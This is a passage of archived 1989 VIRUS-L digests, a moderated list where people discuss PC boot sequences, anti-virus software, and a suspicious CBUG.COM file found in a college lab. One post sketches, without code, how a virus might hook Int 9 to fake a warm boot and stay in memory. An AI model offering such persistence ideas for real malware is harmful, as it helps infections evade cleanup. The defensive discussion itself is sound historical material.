  8299.  
  8300. The catch phrase is `properly functioning', of course. No thanks! :)
  8301.  
  8302. ....
  8303. >When I found some of my 5.25" floppies infected with the Brain virus,
  8304. >some folks at the labs and computing center told me that a
  8305. >write-protected disk couldn't get infected because the
  8306. >write-protection mechanism was "hardware controlled" and couldn't be
  8307. >circumvented by any software. So I was confused when I read the lines
  8308. >(above) because the information given to me by the lab operators is
  8309. >wrong and it is possible to bypass "write-protection" using software.
  8310.  
  8311. Your operator knows what s/he's talking about. The user who posted the
  8312. message does not. Trust the operator. (I'd hate to be at a place where
  8313. users have such an attitude.)
  8314.  
  8315. I think Ken is doing a terrific job, but it worries me that this list
  8316. (which many people consider highly authoritative) is used to spread
  8317. false and harmful rumors. First there was the nonsenical warning about
  8318. a modem virus, that many `novice' users took seriously; now there's
  8319. this. There is an incredible amount of ignorance and computer
  8320. illiteracy out there. We all should be more careful about what we
  8321. post.
  8322.  
  8323. - -Dimitri Vulis
  8324. - -Math Department
  8325. - -CUNY Graduate Center
  8326.  
  8327. ------------------------------
  8328.  
  8329. End of VIRUS-L Digest
  8330. *********************[ Last modified 23 January 89 - Ken van Wyk ]
  8331.  
  8332. Welcome!  This is the  semi-monthly introduction posting   to VIRUS-L,
  8333. primarily for the benefit of any newcomers  to the list.   Many of you
  8334. have probably already seen  a message (or two...)  much like this, but
  8335. it does change from time to time, so I would appreciate it if you took
  8336. a couple of minutes to glance over it.
  8337.  
  8338.  
  8339.  
  8340. What is VIRUS-L?
  8341.  
  8342. It is an electronic mail discussion forum for sharing  information and
  8343. ideas about computer  viruses.  Discussions should include   (but  not
  8344. necessarily  be limited to): current  events  (virus sightings), virus
  8345. prevention    (practical  and   theoretical),    and  virus    related
  8346. questions/answers.   The list  is moderated  and digested.  That means
  8347. that  any message coming  in gets  sent  to  me,  the  editor.  I read
  8348. through the messages and make sure  that they adhere to the guidelines
  8349. of the list (see below) and add them to the  next digest.  Weekly logs
  8350. of digests are kept by the LISTSERV (see below  for  details on how to
  8351. get them).  For  those interested in statistics,  VIRUS-L is now (Jan.
  8352. 23, 1989) up to 950  direct subscribers.  Of  those, approximately  80
  8353. are local redistribution accounts with an unknown number of readers.
  8354.  
  8355. As stated above, the list is digested and moderated.  As such, digests
  8356. go out when a) there are enough messages for  a digest, and  b) when I
  8357. put all incoming (relevant) messages into the digest.  Obviously, this
  8358. can   decrease   the  timeliness of urgent    messages such  as  virus
  8359. warnings/alerts.  For that, we have a sister list called VALERT-L.  It
  8360. is unmoderated  and undigested  - anything  going in  to the list goes
  8361. directly  out  to  all  the  subscribers, as  well  as  to VIRUS-L for
  8362. inclusion in the  next available  digest.   VALERT-L is for  the  sole
  8363. purpose of  rapidly sending out  virus alerts.   Anyone who  does  not
  8364. adhere to this  one guideline of  VALERT-L will be immediately removed
  8365. from the list.   That is, no news   is good  news.  Subscriptions  and
  8366. deletions to  VALERT-L are  handled identically as  those  for VIRUS-L
  8367. (see instructions below).
  8368.  
  8369.  
  8370. What VIRUS-L is *NOT*?
  8371.  
  8372. A place to  spread hype about  computer  viruses;  we already have the
  8373. Press for that.  :-) A place to sell things, to panhandle, or to flame
  8374. other subscribers.  If anyone *REALLY* feels the need to flame someone
  8375. else for something that they may have  said, then the flame  should be
  8376. sent directly to that person and/or to the list moderator  (that would
  8377. be me, <LUKEN@LEHIIBM1.BITNET>).
  8378.  
  8379.  
  8380. How do I get on the mailing list?
  8381.  
  8382. Well, if you are  reading this, chances are *real  good* that  you are
  8383. already on the list.  However, perhaps this  document was given to you
  8384. by a friend or colleague...  So, to get onto the VIRUS-L mailing list,
  8385. send a mail message to <LISTSERV@LEHIIBM1.BITNET>.  In the body of the
  8386. message, say nothing more than SUB  VIRUS-L your name.  LISTSERV  is a
  8387. program which automates mailing lists such as VIRUS-L.  As long as you
  8388. are either on BITNET, or any network accessible to BITNET via gateway,
  8389. this  should work.  Within  a short time, you will  be  placed  on the
  8390. mailing list, and you will get confirmation via e-mail.
  8391.  
  8392.  
  8393. How do I get OFF of the list?
  8394.  
  8395. If, in  the unlikely  event, you should  happen  to want to be removed
  8396. from  the   VIRUS-L     discussion    list,   just    send   mail   to
  8397. <LISTSERV@LEHIIBM1.BITNET>  saying  SIGNOFF VIRUS-L.   People, such as
  8398. students, whose accounts are going to be closed (for example, over the
  8399. summer...) - PLEASE signoff of  the list before  you leave.  Also,  be
  8400. sure to send your signoff request to the LISTSERV and  not to the list
  8401. itself.  Note that the appropriate node  name is LEHIIBM1, not LEHIGH;
  8402. we have a node called LEHIGH, but they are *NOT* one and the same.
  8403.  
  8404.  
  8405. How do I send a message to the list?
  8406.  
  8407. Just send electronic mail  to  <VIRUS-L@LEHIIBM1.BITNET>  and it  will
  8408. automatically be sent to the editor for possible inclusion in the next
  8409. digest to go out.
  8410.  
  8411.  
  8412. What does VIRUS-L have to offer?
  8413.  
  8414. All  VIRUS-L  digests  are stored in  weekly   log  files which can be
  8415. downloaded by  any user on  (or off) the mailing  list.  Note that the
  8416. log files contain all of the digests from a particular week.  There is
  8417. also a small archive  of some of the  public anti-virus programs which
  8418. are currently available.  This  archive, too,  can be accessed  by any
  8419. user.  All  of this is  handled automatically by the  LISTSERV here at
  8420. Lehigh University (<LISTSERV@LEHIIBM1.BITNET>).
  8421.  
  8422.  
  8423. How do I get files (including log files) from the LISTSERV?
  8424.  
  8425. Well, you will first want  to know what  files are   available on  the
  8426. LISTSERV.  To do this, send mail  to <LISTSERV@LEHIIBM1.BITNET> saying
  8427. INDEX VIRUS-L.   Note   that filenames/extensions  are  separated by a
  8428. space, and not by a period.  Once  you  have decided which file(s) you
  8429. want,  send   mail to  <LISTSERV@LEHIIBM1.BITNET> saying  GET filename
  8430. filetype.  For example, GET VIRUS-L LOG8804 would get the  file called
  8431. VIRUS-L LOG8804 (which happens to be the  monthly  log of all messages
  8432. sent to VIRUS-L during   April,  1988).  Note  that, starting  June 6,
  8433. 1988, the logs  are weekly.  The  new file format is  VIRUS-L LOGyymmx
  8434. where yy is  the year  (88, 89, etc.),  mm is the  month, and x is the
  8435. week (A, B, etc.).  Readers who prefer digest format lists should read
  8436. the  weekly logs  and sign   off   of   the  list  itself.  Subsequent
  8437. submissions to the list should be sent to me for forwarding.
  8438.  
  8439. Also available is a  LISTSERV at SCFVM which  contains more anti-virus
  8440. software.   This  LISTSERV  can  be  accessed  in  the  same manner as
  8441. outlined   above,   with  the    exceptions  that    the  address   is
  8442. <LISTSERV@SCFVM.BITNET> and that the commands to  use are INDEX PUBLIC
  8443. and GET filename filetype PUBLIC.
  8444.  
  8445.  
  8446. What is uuencode/uudecode, and why might I need them?
  8447.  
  8448. Uuencode and uudecode are two programs which convert binary files into
  8449. text (ASCII) files and back  again.  This  is so binary  files can  be
  8450. easily transferred via  electronic mail.  Many  of  the files on  this
  8451. LISTSERV  are binary files  which are stored in uuencoded  format (the
  8452. file types will be  UUE).  Both uuencode  and  uudecode  are available
  8453. from the LISTSERV.  Uudecode is available in BASIC and in Turbo Pascal
  8454. here.  Uuencode is available in Turbo  Pascal.  Also, there  is a very
  8455. good binary-only uuencode/uudecode  package on the LISTSERV  which  is
  8456. stored in uuencoded format.
  8457.  
  8458.  
  8459. Why have posting guidelines?
  8460.  
  8461. To keep the discussions on-track with what the list is intended to be;
  8462. a vehicle for virus  discussions.   This will keep the network traffic
  8463. to a minimum and, hopefully, the quality of the content of the mail to
  8464. a maximum.
  8465.  
  8466.  
  8467.  
  8468. What are the guidelines?
  8469.  
  8470.      Try to keep messages relatively short and to the  point, but with
  8471.      all relevant information included.   This serves a  dual purpose;
  8472.      it keeps network traffic to  a necessary minimum, and it improves
  8473.      the likelihood of readers reading your entire  message.
  8474.  
  8475.      Personal information and  .signatures  should   be  kept to   the
  8476.      generally accepted maximum of 5   lines of text.  The editor  may
  8477.      opt  to shorten  some lengthy   signatures (without deleting  any
  8478.      relevant  information, of course).  Within   those  5 lines, feel
  8479.      free to be a bit, er, creative if you wish.
  8480.  
  8481.      Anyone  sending  messages   containing, for  example,   technical
  8482.      information should   *PLEASE*  try  to  confirm their  sources of
  8483.      information.  When possible, site  these sources.  Speculating is
  8484.      frowned upon -  it merely  adds confusion.  This editor does  not
  8485.      have the time to confirm all contributions  to  the list, and may
  8486.      opt to discard messages which do not appear to have valid sources
  8487.      of information.
  8488.  
  8489.      All messages sent  to  the list  should have appropriate  subject
  8490.      lines.  The subject lines should  include the type of computer to
  8491.      which the message  refers, when applicable.  E.g., Subject: Brain
  8492.      virus detection (PC).  Messages without appropriate subject lines
  8493.      *STAND A GOOD CHANCE OF NOT BEING INCLUDED IN A DIGEST*.
  8494.  
  8495.      As already  stated, there will  be no flames  on the list.   Such
  8496.      messages will be discarded.
  8497.  
  8498.      The same goes for any commercial plugs or panhandling.
  8499.  
  8500.      Submissions  should be directly   or indirectly   related  to the
  8501.      subject of computer viruses.  This one is particularly important,
  8502.      other subscribers really  do not want to  read  about things that
  8503.      are  not  relevant  -    it only  adds to  network    traffic and
  8504.      frustration for the people reading the list.
  8505.  
  8506.      Responses to queries should be sent  to the author of  the query,
  8507.      not to the entire list.  The author should then send a summary of
  8508.      his/her responses to the list at a later date.
  8509.  
  8510.      "Automatic  answering machine" programs (the ones  which reply to
  8511.      e-mail for you when you are gone) should be set to *NOT* reply to
  8512.      VIRUS-L.  Such  responses sent to  the entire list are  very rude
  8513.      and will be treated as such.
  8514.  
  8515.      When sending in a submission, try  to see whether or  not someone
  8516.      else  may have just said  the same  thing.   This is particularly
  8517.      important when  responding to postings   from someone else (which
  8518.      should be sent to that person *anyway*).  Redundant messages will
  8519.      be sent back to their author(s).
  8520.  
  8521. Thank-you for your time  and for your  adherence to these  guidelines.
  8522. Comments and suggestions, as always, are invited.  Please address them
  8523. to me, <LUKEN@LEHIIBM1.BITNET> or <luken@Spot.CC.Lehigh.EDU>.
  8524.  
  8525.  
  8526. Ken van WykVIRUS-L Digest            Wednesday, 11 Jan 1989        Volume 2 : Issue 10
  8527.  
  8528. Today's Topics:
  8529. oops, editorial typo
  8530. "False Sense of Security"
  8531. PC Boot sequencez
  8532. Boot sequence (PC)
  8533. Request for information
  8534.  
  8535. ---------------------------------------------------------------------------
  8536.  
  8537. Date: Tue, 10 Jan 89 16:47:37 est
  8538. From: ubu!luken@lehi3b15.csee.lehigh.edu
  8539. Subject: oops, editorial typo
  8540.  
  8541. From my own editorial comment:
  8542. > I suppose the appropriate caveat here is that we have to take *any*
  8543. > report of a virus until it can be verified.
  8544.  
  8545. Oops, saw this just as the digest was leaving my screen for the
  8546. LISTSERV...  That was *supposed* to say that we have to take any
  8547. report of a virus with a grain of salt until it can be verified.
  8548.                   ^^^^^^^^^^^^^^^^^^^^
  8549. The point being - don't trust a virus report until you've gotten
  8550. verification from a reputable source.  E-mail, in general, may not be
  8551. a reputable source.  It's important to follow up a virus report via
  8552. some other form of media, like a phonecall to the author of the
  8553. report.
  8554.  
  8555. Apologies for the typo, I got a bit carried away with the editor...
  8556.  
  8557. Ken
  8558.  
  8559. ------------------------------
  8560.  
  8561. Date:  Tue, 10 Jan 89 21:41 EST
  8562. From:  WHMurray@DOCKMASTER.ARPA
  8563. Subject:  "False Sense of Security"
  8564.  
  8565. Y. Radai writes:
  8566.  
  8567. >  I don't agree that such programs provide very little protection.  I
  8568. >think that the viruses (and worms and Trojans) against which they do
  8569. >afford protection (they may be "amateurish" but they're not
  8570. >necessarily benign!) are still in the majority (at least among those
  8571. >viruses which have become widespread).  And I think that it is well
  8572. >worth protecting oneself against them, even if more sophisticated
  8573. >viruses exist as well and will become more prevalent in the future.
  8574.  
  8575. I think that another useful distinction can be made here.  I suggest
  8576. that such software, to the extent that it makes the machine on which
  8577. it exists different from the population at large, goes a long way to
  8578. making that machine immune to viruses.  It is less effective in
  8579. protecting it against Trojan Horse attacks which are specifically
  8580. aimed at it.
  8581.  
  8582. Viruses exploit the similarities among systems.  Its success is
  8583. independent of its ability to infect any particular machine.  Indeed
  8584. it is naive to anticipate viruses that can account for any and all
  8585. arbitrary differences among machines.  To quote a famous hacker "why
  8586. would anyone do that?"
  8587.  
  8588. One of the problems with viruses is that they can be successful even
  8589. in a population in which many of the targets are partially, or even
  8590. totally, immune.  (Note that the Internet Worm was extremely
  8591. successful, and very disruptive, in a population in which the majority
  8592. of the machines were not suited to it.  It was also disruptive to
  8593. machines in which it could not execute.  It interfered with their
  8594. normal traffic and it sent them attack traffic.  Nonetheless, the
  8595. vulnerability to viruses arises, in part, because there exists a large
  8596. population of similar machines.  In a world in which no two machines
  8597. had any predictable similarity, then, while we might still have Trojan
  8598. Horses, we would have no viruses.
  8599.  
  8600. [Flame on.]
  8601.  
  8602. William Hugh Murray, Fellow, Information System Security, Ernst & Whinney
  8603. 2000 National City Center Cleveland, Ohio 44114
  8604. 21 Locust Avenue, Suite 2D, New Canaan, Connecticut 06840
  8605.  
  8606. ------------------------------
  8607.  
  8608. Date:         Tue, 10 Jan 1989 22:01 CST
  8609. From:         John Ladwig <JLADWIG@UMINN1.BITNET>
  8610. Subject:      PC Boot sequence
  8611.  
  8612. An anecdote regarding messages returned when booting non-system
  8613. diskettes.
  8614.  
  8615. In "Brain and the boot sequence (PC)" (VIRUS-L v2 #5), Dimitri
  8616. Vulis writes:
  8617.  
  8618. [The boot process...]
  8619. > reads in the beginning of the directory and checks that
  8620. > the first 2 files are IBMBIO.COM and IBMDOS.COM (for PC-DOS) or IO.SYS
  8621. > and MSDOS.SYS (for generic MS-DOS). If they are not, it displays (via
  8622. > INT 10) the message: `Non-system disk or disk error, replace, strike
  8623. > any key when ready', waits for a keystroke and does INT 19 again. Of
  8624. > course, it's trivial to replace this message by anything you like,
  8625. > including a German one, and ROM BIOS has nothing to do with this.
  8626.  
  8627. Diskettes formatted using the SideKick Plus 'File Manager'
  8628. display the following message if the are booted without being
  8629. SYSed:
  8630.  
  8631.        Hand crafted by the SideKick Plus File Manager
  8632.  
  8633.        Gavaskar, Bradman, Grace, Compton, Richards, Khan,
  8634.        Knott, Hadlee, Trueman, Lillee, and Holding.
  8635.  
  8636.        Remove the disk from the drive and press any key
  8637.        to restart the system.
  8638.  
  8639. The text is found in the boot sector, starting at offset 52 (decimal).
  8640. The text "SKDOS1.0" appears at offset 4.
  8641.  
  8642. I must say that I was a bit surprised when I discovered this by
  8643. accident.  (Goes to show that you should read the manual thoroughly
  8644. :-))
  8645.  
  8646. ------------------------------
  8647.  
  8648. Date:     Wed, 11 Jan 89 01:05 EST
  8649. From:     Dimitri Vulis <DLV@CUNYVMS1.BITNET>
  8650. Subject:  Boot sequence (PC)
  8651.  
  8652. (Please excuse the long quotes)
  8653.  
  8654. >  The other point:  In V2 #5, Dimitri wrote:
  8655. >>       ... it reads in the beginning of the directory and checks that
  8656. >>and MSDOS.SYS (for generic MS-DOS). ....
  8657. >>If these files are there, it reads (using INT 13) the first one (DOS
  8658. >>low-level routines, _not_ BIOS---BIOS is in ROM!) into memory, usually
  8659. >>at 70:0, and jumps there. IBMBIO.COM then loads the rest of DOS.
  8660. >  The clause "it reads ... the first one [i.e. IBMBIO.COM or IO.SYS]
  8661. >into memory" is not quite accurate.  It seems that what actually
  8662. >happens is that the disk bootstrap routine loads a certain number of
  8663. >sectors, starting from the beginning of the data area, into RAM, under
  8664. >the *assumption* that these contain IBMBIO.COM/IO.SYS.  Depending on
  8665. >the implementation, it may also do the same with the following sectors
  8666. >on the assumption that they contain IBMDOS.COM/MSDOS.SYS, or else the
  8667. >former program may load the latter.  But if the disk has been tampered
  8668. >with, it is not necessarily these two files which will get loaded.
  8669. >                                           Y. Radai
  8670.  
  8671. I stand by what I said. The SYS command does a lot of elaborate
  8672. checking to make sure that IBMBIO.COM fits contigiously into the first
  8673. data sectors on disk. FORMAT/S just writes the file into the first
  8674. data sectors. The boot code has to make certain assumptions---there's
  8675. not enough room for the logic to read the FAT and compute the
  8676. sector/track for each cluster to simulate a file call.  So, it assumes
  8677. that if the disk has IBMBIO.COM and IBMDOS.COM as the first files in
  8678. the directory, (and finding that takes room too) and if they are
  8679. hidden/system, then the code assumes that the disk is OK and
  8680. IBMBIO.COM is indeed in the first data sectors. It computes the
  8681. sector/track for these sectors and (ordinarily) reads in the file
  8682. using INT 13 (note the wording).  Certainly, one can mess around with
  8683. a disk and create one that won't boot, because IBMBIO.SYS is not at
  8684. the beginnig. This would require some (a little) conscious effort and
  8685. cannot easily be done with just FORMAT/S or SYS. I was describing a
  8686. successful boot, in which the file is read into memory.
  8687.  
  8688. Regarding the other point (Trojan-protection software):
  8689.  
  8690. That's a matter of opinion. FSP 1.4 is the only such program that I'm
  8691. familiar with that is marginally acceptable to me. The previous
  8692. versions of it did more harm than good. Most other programs of this
  8693. type (that intersept INT 13 and report suspicious activity) are
  8694. useless. What good is a program that indiscriminately reports _every_
  8695. disk access? It is unconscienable(sp?) that some crooks charge money
  8696. for such programs and use cheap scare tactics to induce dumb ignorant
  8697. people to pay for them. By the way, I don't even use FSP 1.4, and
  8698. here's the reason: some time ago (years) I called Ross Greenberg's
  8699. BBS, and there was a message from him saying that over 50% of uploads
  8700. to his board turn out to be Trojans. I'm not implying that the guy is
  8701. unstable, but I'd rather see the source code for a program that
  8702. intercepts disk access and can potentially do very nasty things
  8703. (remember NOTROJ?).
  8704.  
  8705. Also, by the way, last semester I wrote a short (COM file) virus for
  8706. my cryptography class that _infected_ FSP 1.4.
  8707.  
  8708. >  The only argument which Dimitri gives for his statement is that one
  8709. >might be lulled into using less discretion in deciding what to run on
  8710. >his machine.  Now I would understand this argument in a situation
  8711. >where anti-viral software is sold to naive customers under the false
  8712. >pretense that it will prevent all types of infection.  But are we so
  8713. >naive?  To give the impression, as Dimitri does, that it is worse to
  8714. >use such software than not to use it, is certainly not correct in
  8715. >general.  He doesn't explain just what his notion of discretion
  8716. >consists of, but whatever it may be, why can't we use *both*
  8717. >anti-viral software *and* discretion ....??
  8718.  
  8719. What do I mean by discretion? Well, I don't download software from
  8720. BBS's anymore (too bad), I back up everything I've done at the end of
  8721. the day (have been for many years), and I don't have stuff (executable
  8722. and other) online that I don't need. I don't happen to use a
  8723. floppy-based machine, but if I did, I'd make sure I reboot from a
  8724. write-protected floppy I can trust.
  8725.  
  8726. If you look at the ads in US computer magazines, that's exactly what's
  8727. said/implied: 1) _everyone_ needs such programs, 2) they offer 100%
  8728. protection.  I'm willing to believe that Israeli users are smarter
  8729. than American users. In this country even complete idiots (pardon my
  8730. French) use PCs---just read some of the recent messages in this very
  8731. digest. When you place a very stupid and ignorant individual in front
  8732. of a PC without giving him/her adequate instruction, you open a
  8733. Pandora's box of problems, one of which is this Virus/Trojan thing.
  8734. How many of your users can say whether this is true or false (for an
  8735. IBM PC; Mac is something else yet):
  8736.  
  8737. (1) Virus software can override write-protect tabs
  8738.  
  8739. (2) Viruses can spread via e-mail messages
  8740.  
  8741. (3) Viruses are the most common type of Trojan horse programs
  8742.  
  8743. (4) A virus can spread from a PC to VAX or VM and vice versa
  8744.  
  8745. Such a misinformed individual will typically pay some gonef $$$ for a
  8746. piece of code that TSRs and checks for INT 13 functions `write',
  8747. `format', `format fancy', `format fancy with twist', etc, without
  8748. analysing where they came from; it will produce too much output and
  8749. s/he will habitually turn it off; nevertheless, s/he will feel fully
  8750. protected and will promiscuously load all kinds of suspect software
  8751. and will never take a backup. (We have, by the way, a gay fellow, a
  8752. good mathematician, who does not believe that AIDS is caused by a
  8753. virus, or, for that matter, is spread sexually; and he's still alive!)
  8754.  
  8755. ------------------------------
  8756.  
  8757. Date:    Wed, 11 Jan 89 02:32:12 EST
  8758. From: <Xc60039@PORTLAND.BITNET> (Douglas Howell)
  8759. Subject: Request for information
  8760.  
  8761.   Hello.  I am wondering if any of you might be able to help
  8762. me.  I'm doing a study on viruses and would like to get any
  8763. information available on them.  Particularly I would like to
  8764. ask anyone who has a virus which has been disected with
  8765. accompaning documentation to send it to me. I am new to this
  8766. list so I have not had much time to read through past issues
  8767. yet.  I shall do that when classes resume.
  8768.     Could anyone explain to me how to construct a virus.
  8769. Just the basics will do nicely.  I'll gladly accept any
  8770. information that is sent to me no matter it's length.  I'll
  8771. also be needing information on how to deactivate the
  8772. 'common' virus.
  8773.     I realize that this is a lot to ask, but I'm hoping that
  8774. many of you will respond and help me out.
  8775. I wish to state right here and now that I am not requesting a
  8776. living or active virus or trojan horse.  This is my third
  8777. revision and yet the clarity of my request still remains in
  8778. question.  I relize the severity of what I ask for, and for
  8779. all intensions I see no harm in it.  Please contact me directly
  8780. if there are any questions.
  8781.  
  8782.                     Douglas Howell
  8783.                     (xc60039@Portland)
  8784.  
  8785. [Ed. Doug has revised this message a few times, and each time I sent
  8786. it back because he was requesting a copy of a virus; something which I
  8787. will not promote here on VIRUS-L.  I believe that it is a bad idea to
  8788. send copies of viruses to others, particularly when requested only via
  8789. e-mail.  I trust that anyone responding to such a request will
  8790. exercise due caution.]
  8791.  
  8792. ------------------------------
  8793.  
  8794. End of VIRUS-L Digest
  8795. *********************VIRUS-L Digest            Wednesday, 11 Jan 1989        Volume 2 : Issue 11
  8796.  
  8797. Today's Topics:
  8798. Re: proprietary vs pd software
  8799. boot sequence (PC)
  8800. VIRUS ALERT: possible virus... keywords: CBUG, WEIRD (PC)
  8801.  
  8802. ---------------------------------------------------------------------------
  8803.  
  8804. [Ed. While trying to move the editing of VIRUS-L over to a different
  8805. machine today, I had a fight with the LISTSERV - it was converting my
  8806. address to uppercase, and Xenix wasn't delivering the mail to me.
  8807. It's possible that, during the scuffle, one or two messages to the
  8808. list were lost, and/or sent back to their author(s).  If this happened
  8809. to you, please resubmit your message, and I apologize.]
  8810.  
  8811. Date:         Wed, 11 Jan 89 13:51:35 EST
  8812. From:         Neil Goldman <NG44SPEL@MIAMIU.BITNET>
  8813. Subject:      Re: proprietary vs pd software
  8814.  
  8815. Stan Horwitz writes that Fred Cohen has determined that proprietary
  8816. software is a more common source of viruses than public domain (and
  8817. shareware?) software is.  This seems contrary to all the discussion I
  8818. have read and participated in on this list as well as in published
  8819. reports (for whatever they are worth).
  8820.  
  8821. I am very interested in how Dr. Cohen has determined this.
  8822.  
  8823. Comment?
  8824.  
  8825. Neil A. Goldman                        NG44SPEL@MIAMIU.BITNET
  8826.  
  8827. Replies, Concerns, Disagreements, and Flames expected.
  8828. Mastercard, Visa, and American Express not accepted.
  8829. Acknowledge-To: <NG44SPEL@MIAMIU>
  8830.  
  8831. ------------------------------
  8832.  
  8833. Date:        11 January 89, 20:00:17 +0100 (MEZ)
  8834. From:        Otto Stolz         +49 7531 88 2645     RZOTTO   at DKNKURZ1
  8835. Subject:     boot sequence (PC)
  8836.  
  8837. > When a user presses ctl-alt-del, the keyboard code in BIOS [...]
  8838. > redirects interrupt vectors to their default values, then boots. A
  8839. > worm sitting in memory (not a _virus_) would have to duplicate all the
  8840. > machine-specific stuff for various possible machines
  8841.  
  8842. What if the virus (why not?), or worm, simply hooks Int 9?
  8843.  
  8844. Then it could fake the warm boot by resetting the interrupt vectors
  8845. in a non-standard way that allowed itself to survive in memory and then
  8846. jumping to the booting code.  The machine-specific stuff would only be
  8847. the default values of the interrupt vectors (may be, even they are rather
  8848. standard, or can be derived from the memory contents -- I don't know).
  8849.  
  8850. Or it could infect the disk/diskette to be booted from, and then rely
  8851. on BIOS to be installed again;  the machine specific stuff would be nil,
  8852. and if it was a boot-sector virus, all required subroutines would already
  8853. be part of it.
  8854.  
  8855. Just a thought...
  8856.  
  8857. O, I just remember some expert told me that the Yale virus did redefine
  8858. Ctrl-alt-Sequences.  Hence I guess, my thought is not so far off from
  8859. what virus-inventors might consider.  So, be prepared!
  8860.  
  8861. Conclusion: Never, ever, warm-boot an infected computer.
  8862.  
  8863. Best wishes
  8864.             Otto
  8865.  
  8866. ------------------------------
  8867.  
  8868. Date:         Wed, 11 Jan 89 16:04:00 EST
  8869. Sender:       Virus Alert List <VALERT-L@IBM1.CC.Lehigh.Edu>
  8870. From:         Michael Brown <BROWN@CMR001.BITNET>
  8871. Subject:      VIRUS ALERT: possible virus... keywords: CBUG, WEIRD (PC)
  8872.  
  8873.     *Something a bit strange has appeared in one of our IBM PC labs.*
  8874.  
  8875.      One of our AT clones has a file called C:\CBUG.COM. Running CBUG.COM
  8876. has the following effect: The first time the Y key is pressed, it
  8877. prints the message "YOUR COMPUTER IS NOW INFECTED WITH SOME WEIRD VIRUSES",
  8878. and it hangs the system. A warm boot will restore the system to normal.
  8879.  
  8880. I looked at the file with PCTOOLS. It is a normal .COM file with a
  8881. length of 149 bytes. The message is clearly embedded in the beginning of
  8882. the file. The rest of the file contains  a block of 00h then a irregular
  8883. pattern of 00h 0Fh and FFh. The file is dated 1/01/80 (which is unusual,
  8884. because that machine has a clock, and usually get the date right) and
  8885. the machine is running PCDOS 3.3.
  8886.  
  8887. I checked the disk for other occurrences of the message, but it seems
  8888. to only be there once.
  8889.  
  8890. If I cold start the system:
  8891.  - run CBUG once, and type a Y, I get the message and the system hangs
  8892.  - run CBUG twice, and type a Y, I get the message and the system hangs
  8893.  - either time the system will warm boot
  8894.  - run CBUG three times, and type a Y, I get the message, the next time
  8895.    I type a Y it displays the message again and again until the fourth time
  8896.    the Y key is typed, then the system hangs and I cannot do a warm boot.
  8897. - - something similar happens if I run CBUG four times.
  8898. - - If I run CBUG five times, the number of time before the system hangs
  8899.   is irregular, but it always displays the message.
  8900.  
  8901. Enough said.
  8902.  
  8903. 1) Has anyone seen this before????
  8904. 2) Any suggestions????
  8905.  
  8906. I am planning on working on it tonight, using the following procedure...
  8907. - - Installing FSP 1.4 on the machine. (I have never used FluShot+, but from
  8908.   my understanding it is reliable).
  8909. - - Running all of the software packages installed on the machine to find
  8910.   out if any of the programs on the hard disk call it.
  8911. - - I will ask the people that used the machine in the last few days
  8912.   to use all of the software (on floppies) that they used while
  8913.   the machine is running under FSP.
  8914. - - I am *not* sure this is a virus, but I don't understand how the
  8915.   file got into the root directory of the disk, as most of the users
  8916.   use the software on the hard disk or if they use floppies, it is to
  8917.   play games. (There are only 3 files in c:\ , command.com, config.sys and
  8918.   CBUG.COM and there are 4 subdirectories with utilities that we purchased)
  8919.  
  8920. I am assuming that this procedure will help me find out 1) if it is a virus,
  8921. and 2) the source of the virus if such a beast exists. There is always
  8922. a possiblilty of this being a prank done by someone, but I cannot see
  8923. it being one of our student or staff as none of them know enough about
  8924. the IBM PC to create such a program. (we are a small college of 600
  8925. students with a small percentage in computer related studies).
  8926.  
  8927.  
  8928. Thanx for your time,
  8929. Any help/suggestions/flames would be appreciated.
  8930. Please reply directly to me, I will summarize to the list appropriately.
  8931.  
  8932.                   CP6-Mail: Michael Brown @CMR
  8933.                   NET-Mail: <brownm@cmr001.bitnet>
  8934. Michael Brown   Snail-Mail: Service Informatique CMR, St-Jean, Que. J0J 1R0
  8935.  
  8936. ------------------------------
  8937.  
  8938. End of VIRUS-L Digest
  8939. *********************VIRUS-L Digest             Thursday, 12 Jan 1989        Volume 2 : Issue 12
  8940.  
  8941. Today's Topics:
  8942. Re:  What happens in the floppy boot process (PC)
  8943. Re: VIRUS ALERT: possible virus... keywords: CBUG, WEIRD (PC)
  8944. CBUG.COM (PC)
  8945.  
  8946. ---------------------------------------------------------------------------
  8947.  
  8948. Date:         Wed, 11 Jan 1989 14:01:08 PLT
  8949. From:         Wim Bonner <27313853@WSUVM1.BITNET>
  8950. Subject:      Re:  What happens in the floppy boot process (PC)
  8951.  
  8952. All that is done on a floppy boot is that the boot sector is read, and
  8953. control is passed to a minature program which is stored in the boot
  8954. sector.  In the case of a non-bootable disk, a message is printed, and
  8955. the computer waits for a keypress, then calls the bootstrap routine
  8956. again.  (ROM Bios calls for both I assume)
  8957.  
  8958. In the case of a bootable disk, all it does is load continuos sectors
  8959. starting with an offset (past the FATs and root directory.) then pass
  8960. control to the loaded program.
  8961.  
  8962. If you wipe out the IBMBIOS and IBMDOS (can't remember the names
  8963. exactly) from the directoryof a previously bootable disk, the disk
  8964. will still try to boot, but when it passes control, very unpredictable
  8965. things will happen.  (usually a complete lockup!)
  8966.  
  8967. Any program which can be written using no DOS calls, and which is less
  8968. than a sector can concievable be put into the boot sector of a disk.
  8969.  
  8970. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  8971. - -=-=-=-=-=-=-=-=-=- 10,000 Lemmings can't be wrong! -=-=-=-=-=-=-=-=-
  8972. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  8973. Wim Bonner  Bitnet:27313853@WSUVM1  Compuserve:72561,3135  (King-Rat)
  8974. The Loft - (509)335-7407 - 300/1200/2400 - 24hrs/day - PCboard 12.1/d
  8975. Acknowledge-To: <27313853@WSUVM1>
  8976.  
  8977. ------------------------------
  8978.  
  8979. Date:         Wed, 11 Jan 89 19:37:42 PLT
  8980. From:         Wim Bonner <27313853@WSUVM1.BITNET>
  8981. Subject:      Re: VIRUS ALERT: possible virus... keywords: CBUG, WEIRD (PC)
  8982.  
  8983. I would suggest getting on of the Assembly dissasemblers, and running
  8984. it.  It would be interesting to know what the 149 byte program would
  8985. look like in normal assembly code.  I have seen a program called
  8986. CRACKER on some BBS programs recently, and have used it on a small
  8987. file.  It made a pretty nice program listing.
  8988.  
  8989. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  8990. - -=-=-=-=-=-=-=-=-=- 10,000 Lemmings can't be wrong! -=-=-=-=-=-=-=-=-
  8991. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
